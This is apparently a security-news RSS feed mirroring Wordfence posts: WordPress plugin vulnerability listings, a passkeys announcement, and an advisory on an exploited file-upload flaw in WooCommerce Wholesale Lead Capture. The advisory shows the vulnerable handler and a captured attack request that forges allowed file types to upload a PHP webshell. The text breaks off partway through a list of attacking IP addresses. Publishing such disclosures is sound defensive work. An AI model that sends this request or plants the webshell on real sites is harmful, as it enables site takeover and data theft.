<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</a> <span class="wfvr-software-slug">[visualizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d211a77-82fe-4835-ac06-acec9e06864a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eee25825-2308-4234-b72b-6cb11b658a6e" target="_blank" rel="noopener">WP Recipe Maker &lt;= 10.8.0 &#8211; Missing Authorization to Authenticated (Contributor+) Arbitrary Recipe Ownership Takeover and Unpublishing via &#8216;[wprm-recipe]&#8217; Shortcode</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75905" target="_blank" rel="noopener noreferrer">							CVE-2026-75905						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recipe-maker" target="_blank" rel="noopener">WP Recipe Maker</a> <span class="wfvr-software-slug">[wp-recipe-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eee25825-2308-4234-b72b-6cb11b658a6e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f58c208-71a8-4276-bdba-f7e87acd78fc" target="_blank" rel="noopener">WP-Stateless – Google Cloud Storage &lt;= 4.4.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Settings Update</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81801" target="_blank" rel="noopener noreferrer">							CVE-2026-81801						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-stateless" target="_blank" rel="noopener">WP-Stateless – Google Cloud Storage</a> <span class="wfvr-software-slug">[wp-stateless]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johan-buenavida" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b60e19265d71fc1776214f549aed590.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b60e19265d71fc1776214f549aed590"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johan-buenavida" target="_blank" rel="noopener">Johan Buenavida</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f58c208-71a8-4276-bdba-f7e87acd78fc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a7e624b-2b1b-4f7e-857d-db65f17e7787" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode 4.0.2 &#8211; 4.4.1 &#8211; Missing Authorization to Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85132" target="_blank" rel="noopener noreferrer">							CVE-2026-85132						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a7e624b-2b1b-4f7e-857d-db65f17e7787" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5641ad8f-3c33-4699-8c2b-7fa4451703a6" target="_blank" rel="noopener">WPLP Cookie Consent &lt;= 4.4.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85133" target="_blank" rel="noopener noreferrer">							CVE-2026-85133						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5641ad8f-3c33-4699-8c2b-7fa4451703a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85bcfab6-568e-4bb5-bf5e-99d1c014f9a1" target="_blank" rel="noopener">WPLP Cookie Consent &lt;= 4.4.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82185" target="_blank" rel="noopener noreferrer">							CVE-2026-82185						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9e8c4676e82018ccf86cc684191f1e94.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9e8c4676e82018ccf86cc684191f1e94"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener">RIA Labs</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85bcfab6-568e-4bb5-bf5e-99d1c014f9a1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-intelligence-weekly-wordpress-vulnerability-report-september-7-2026-to-september-13-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (September 7, 2026 to September 13, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Boost Engagement with Free Passkeys by Wordfence</title>
		<link>https://swiftupdates.ca/boost-engagement-with-free-passkeys-by-wordfence/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 15 Sep 2026 20:56:04 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/boost-engagement-with-free-passkeys-by-wordfence/</guid>

					<description><![CDATA[Imagine you can sign in with one click. Now imagine all the users on your WooCommerce store or WordPress powered website can sign in with one click. Firstly it makes your life a lot easier. But more importantly, you’ve removed friction from users logging in to make purchases, to engage in your forums, and to [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Imagine you can sign in with one click. Now imagine all the users on your WooCommerce store or WordPress powered website can sign in with one click. Firstly it makes your life a lot easier. But more importantly, you’ve removed friction from users logging in to make purchases, to engage in your forums, and to engage with your website. When you’re running at scale, even a small friction reduction yields large dividends.</p>
<p><a href="https://www.wordfence.com/help/login-security/passkeys/" target="_blank" rel="noopener">Wordfence 9 introduces passkeys</a>, and passkeys provide a huge friction reduction because your user no longer has to remember their password or retrieve it from a password manager and copy/paste. They can simply sign in with a single click. And the friction is even less on mobile with fingerprint or facial recognition enabled passkeys.</p>
<p>Let’s be honest: Security almost always adds friction. From having to login, to using 2FA, to password changes, to basic security hygiene. By adding security controls, security practitioners like us generally add friction to your daily life, and to your users. Which is why it makes me very happy when we launch a feature that removes friction. And weirdly, the more friction you remove, the more secure it is. What I mean by that is, if you disable the ability to sign in using a password, and only use passkeys, you become less vulnerable to phishing attempts.</p>
<p>Passkeys have historically been a feature that other WordPress security plugins have charged for. Our overarching philosophy at Wordfence for how we decide to charge for something is: if it costs us money to provide then we feel OK about sharing that cost with our customers. Passkeys are free for us to provide and are simply an algorithmic implementation, and so we feel pretty good about being able to make it completely free. I’m also very proud of what our team accomplished with the implementation, because it’s rock solid and gives you the option to have multiple passkeys across multiple devices, reducing the likelihood of you locking yourself out.</p>
<p>Enable passkeys with the <a href="https://www.wordfence.com/products/wordfence-free/" target="_blank" rel="noopener">Free</a> or <a href="https://www.wordfence.com/products/pricing/" target="_blank" rel="noopener">Paid version</a> of Wordfence today, and promote it to your users to immediately reduce friction and boost site engagement.</p>
<p>Mark Maunder — Wordfence Founder &amp; CEO</p>
<hr>
<h2>How to Get Started With Passkeys in Wordfence</h2>
<p>Passkeys are available in both the free and paid versions of Wordfence, and take about a minute to enable.</p>
<h3>1. Open Login Security</h3>
<p><strong>Go to Wordfence → Login Security.</strong> If passkeys are not enabled yet, you will see the option to turn them on, along with a summary of how they work.</p>
<p><em>Note: You must have the right permissions, typically users assigned the admin role, to edit Login Security Settings.</em></p>
<p><img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/enable-passkeys.png" alt="The Wordfence My Passkeys tab with passkeys not yet enabled, showing the Enable Passkeys button and a three-step summary: enable passkeys, users register a passkey, users sign in with no password needed."></p>
<h3>2. Enable passkeys and choose who can use them</h3>
<p><strong>On the Settings tab, switch Enable passkeys on.</strong> Once enabled, every role defaults to Optional, which means users can register a passkey but can still sign in with their password. Setting a role to Required is what disables password sign-in for that role, which is the stronger anti-phishing position.</p>
<p><img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/passkeys-settings.png" alt="The Wordfence Login Security settings screen with Enable passkeys switched on, and the role table below it showing passkeys set to Optional for Administrator, Editor, Author, Contributor and Subscriber."></p>
<h3>3. Add your first passkey</h3>
<p><strong>On the My Passkeys tab, give the passkey a name and select the plus sign to add it.</strong> Your device will ask for a fingerprint, a face scan, a PIN, or you can use a password manager. You can register a passkey on each device you use, so losing one does not lock you out.</p>
<p>The same screen is where you choose whether a password stays available as a backup, or whether the account signs in with Passkeys only. Before signing out of your site, be sure to test your passkeys if you have opted for Passkeys only.</p>
<p><img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/my-passkeys-registered.png" alt="The Wordfence My Passkeys tab with one registered passkey named passkey-new, and a How do you want to log in? card offering either username and password as a backup or passkeys only."></p>
<h3>4. Sign in with one click</h3>
<p>From then on, the WordPress login screen offers Log In with a Passkey. <strong>No password to remember, retrieve, or type</strong> (this is why passkeys enable what is referred to as “passwordless login”).</p>
<p><img decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/wf-login-passkey-button.jpg" alt="A WordPress login form showing the usual username and password fields with a Log In with a Passkey button below them, offering passwordless sign-in as an alternative."></p>
<p><strong>Passkeys strengthen one layer of your site’s security, while increasing convenience and reducing friction for website users and admins.</strong></p>
<p>Wordfence is designed for defense in depth by giving you a layered approach to security with our range of features. Passkeys protect the login layer by removing the password an attacker would otherwise try to steal, phish or reuse.</p>
<p>Passkeys are available for free in the Wordfence plugin — enable them today to add a new layer of security to your WordPress sites.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-passkeys/" target="_blank" rel="noopener">Boost Engagement with Free Passkeys by Wordfence</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Attackers Actively Exploiting Critical Vulnerability in WooCommerce Wholesale Lead Capture Plugin</title>
		<link>https://swiftupdates.ca/attackers-actively-exploiting-critical-vulnerability-in-woocommerce-wholesale-lead-capture-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Mon, 14 Sep 2026 19:50:16 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/attackers-actively-exploiting-critical-vulnerability-in-woocommerce-wholesale-lead-capture-plugin/</guid>

					<description><![CDATA[On February 20th, 2026, a critical Unauthenticated Arbitrary File Upload vulnerability was publicly disclosed in WooCommerce Wholesale Lead Capture, a premium WordPress plugin with an estimated 6,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to upload arbitrary files, including PHP backdoors, and achieve remote code execution. We added this vulnerability to the [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On February 20th, 2026, a critical Unauthenticated Arbitrary File Upload vulnerability was publicly disclosed in <a href="https://wholesalesuiteplugin.com/woocommerce-wholesale-lead-capture/" target="_blank" rel="noopener">WooCommerce Wholesale Lead Capture</a>, a premium WordPress plugin with an estimated 6,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to upload arbitrary files, including PHP backdoors, and achieve remote code execution. We added this vulnerability to the Wordfence Intelligence vulnerability database on February 25th, 2026. <strong>The Wordfence Firewall has already blocked over 100,000 exploit attempts targeting this vulnerability</strong>.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in WooCommerce Wholesale Lead Capture on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026.</p>
<p>Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of WooCommerce Wholesale Lead Capture, version 2.0.3.2 at the time of this writing, as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e2bf4a8-1dca-47fb-8164-acca0b2cf4f2" target="_blank" rel="noopener">Woocommerce Wholesale Lead Capture &lt;= 2.0.3.1 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27540" target="_blank" rel="noopener noreferrer">							CVE-2026-27540						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 2.0.3.1</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">2.0.3.2</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-wholesale-lead-capture" target="_blank" rel="noopener">Wholesale Lead Capture Plugin for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-wholesale-lead-capture]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/teemu-saarentaus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/953a6b5b9666b12d2c5625b857f80015.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="953a6b5b9666b12d2c5625b857f80015"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/teemu-saarentaus" target="_blank" rel="noopener">Teemu Saarentaus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Wholesale Lead Capture Plugin for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.0.3.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site&#8217;s server which may make remote code execution possible.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e2bf4a8-1dca-47fb-8164-acca0b2cf4f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Vulnerability Details</h2>
<p>WooCommerce Wholesale Lead Capture is a premium plugin that provides a custom wholesale registration form, including support for file upload fields. The plugin exposes an AJAX action, <code>wwlc_file_upload_handler</code>, that processes these uploads and is reachable by unauthenticated visitors.</p>
<pre class="brush: php; first-line: 302; title: ; notranslate">
public function wwlc_file_upload_handler() {

	if ( ! function_exists( 'wp_handle_upload' ) )
		require_once( ABSPATH . 'wp-admin/includes/file.php' );

	$uploaded_file = $_FILES[ 'uploaded_file' ];
	$file_settings = $_REQUEST[ 'file_settings' ];
	$file_settings = stripslashes( $file_settings );
	$file_settings = json_decode( $file_settings );
	$file_settings = (array) $file_settings;

	$temp      = explode( '.' , $uploaded_file[ 'name' ] );
	$ext       = end( $temp );
	$error_msg = '';

	// Enforce restriction of allowed filetypes
	if ( ! in_array( $ext , $file_settings[ 'allowed_file_types' ] ) || ! in_array( $uploaded_file[ 'type' ] , get_allowed_mime_types() ) ) {

		$error_msg = __( 'The format of the file you selected is not supported', 'woocommerce-wholesale-lead-capture' );

	} else if ( $uploaded_file[ 'size' ] &gt; (int) $file_settings[ 'max_allowed_file_size' ] ) {

		$error_msg = __( 'The file you selected exceeds the maximum allowed file size', 'woocommerce-wholesale-lead-capture' );

	}

	if ( $error_msg ) {

		$response = array(
			'status'  =&gt; 'fail',
			'message' =&gt; $error_msg
		);

		if ( defined( 'DOING_AJAX' ) &amp;&amp; DOING_AJAX ){

			header( 'Content-Type: application/json' );
			echo json_encode( $response );
			die();

		} else return $response;

	}

	// Generate unique number and add to filename
	$uploaded_file[ 'name' ] = str_replace( '.' . $ext , '' , $uploaded_file[ 'name' ] ) . '-' . time() . '.' . $ext;

	$upload_overrides = array(
		'test_form' =&gt; false,  // Turn off to avoid 'Invalid form submission.'
		'test_type' =&gt; false   // Bypass mime type check so we can avoid doing upload_mimes filter.
	);

	// Set temp upload directory for wwlc file upload
	add_filter( 'upload_dir' , array( $this-&gt;wwlc_bootstrap , 'wwlc_set_temp_directory' ) );

	// Perform file upload
	$file     = wp_handle_upload( $uploaded_file , $upload_overrides );
</pre>
<p>In the vulnerable version, the handler does check the uploaded file’s extension against a list of allowed file types. However, that list of allowed file types is read directly from the request rather than from the form’s server-side configuration. Because the check relies on this attacker-controlled value, an unauthenticated attacker can simply include php in their own list of allowed file types to bypass the restriction and upload a file with a <code>.php</code> extension.</p>
<p>This makes it possible for unauthenticated attackers to write a PHP webshell to the site and execute arbitrary code, which can be leveraged to create administrator accounts, exfiltrate data, or take complete control of the site.</p>
<p>As with all arbitrary file upload vulnerabilities, this can lead to complete site compromise through the use of webshells and other techniques.</p>
<h2>A Closer Look at the Attack Data</h2>
<p>The following data highlights actual exploit attempts from threat actors targeting this vulnerability. The attacker submits a request to the <code>wwlc_file_upload_handler</code> AJAX action containing a forged <code>file_settings</code> parameter and a malicious file with a <code>.php</code> extension.</p>
<h3>Example attack request</h3>
<pre class="brush: plain; title: ; notranslate">
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=e192c99c2c475858ec1b8e220b8f7674

--e192c99c2c475858ec1b8e220b8f7674
Content-Disposition: form-data; name="action"

wwlc_file_upload_handler
--e192c99c2c475858ec1b8e220b8f7674
Content-Disposition: form-data; name="file_settings"

{"allowed_file_types": ["php", "jpg"], "max_allowed_file_size": 99999999}
--e192c99c2c475858ec1b8e220b8f7674
Content-Disposition: form-data; name="uploaded_file"; filename="shell.php"
Content-Type: application/octet-stream
Expires: 0

&lt;?php 
echo "sohai";
if(isset($_GET['sohai'])){
echo(php_uname().'&lt;form method="post" enctype="multipart/form-data" name="uploader" id="uploader"&gt;&lt;input type="file" name="file" size="30"&gt;&lt;input type="submit" value="Upload"&gt;&lt;/form&gt;');if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo('ok');}
}

--e192c99c2c475858ec1b8e220b8f7674--
</pre>
<p>The uploaded <code>shell.php</code> is a PHP webshell that reports host details and provides a browser-based upload form for writing additional malicious files to the site.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/woocommerce-wholesale-lead-capture-file-upload-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/woocommerce-wholesale-lead-capture-file-upload-howto-wordfence-firewall.png" alt="woocommerce wholesale lead capture file upload howto wordfence firewall" width="1046" height="726" class="alignnone size-full wp-image-43202"></a></p>
<h2>Total Number of Exploits Blocked</h2>
<p>The Wordfence Firewall has <strong>blocked over 100,000 exploit attempts</strong> since the vulnerability was publicly disclosed.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-06-WAF-899.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-06-WAF-899.png" alt="Blocked attacks 06 WAF 899" width="1024" height="768" class="alignnone size-full wp-image-43203"></a></p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-07-WAF-899.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-07-WAF-899.png" alt="Blocked attacks 07 WAF 899" width="1024" height="768" class="alignnone size-full wp-image-43204"></a></p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-08-WAF-899.png" target="_blank" rel="noopener"><img decoding="async" loading="lazy" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-08-WAF-899.png" alt="Blocked attacks 08 WAF 899" width="1024" height="768" class="alignnone size-full wp-image-43205"></a></p>
<p>According to our data, attackers have been targeting this vulnerability for months, with a large number of exploit attempts blocked between June 4th and June 17th, and also on July 1st and August 30th.</p>
<h2>Top Offending IP Addresses</h2>
<p>The following IP Addresses are currently the most actively engaged IP addresses targeting the WooCommerce Wholesale Lead Capture:</p>
<ul>
<li>92.241.13.213
<ul>
<li>Over <strong>24,900</strong> blocked requests.</li>
</ul>
</li>
<li>31.59.129.150
<ul>
<li>Over <strong>24,000</strong> blocked requests.</li>
</ul>
</li>
<li>2a0f:85c1:840:5389::1
<ul>
<li>Over <strong>16,000</strong> blocked requests.</li>
</ul>
</li>
<li>92.241.13.140
<ul>
<li>Over <strong>9,100</strong> blocked requests.</li>
</ul>
</li>
<li>23.137.105.214
<ul>
<li>Over <strong>6,700</strong> blocked requests.</li>
</ul>
</li>
<li>23.180.120.140
<ul>
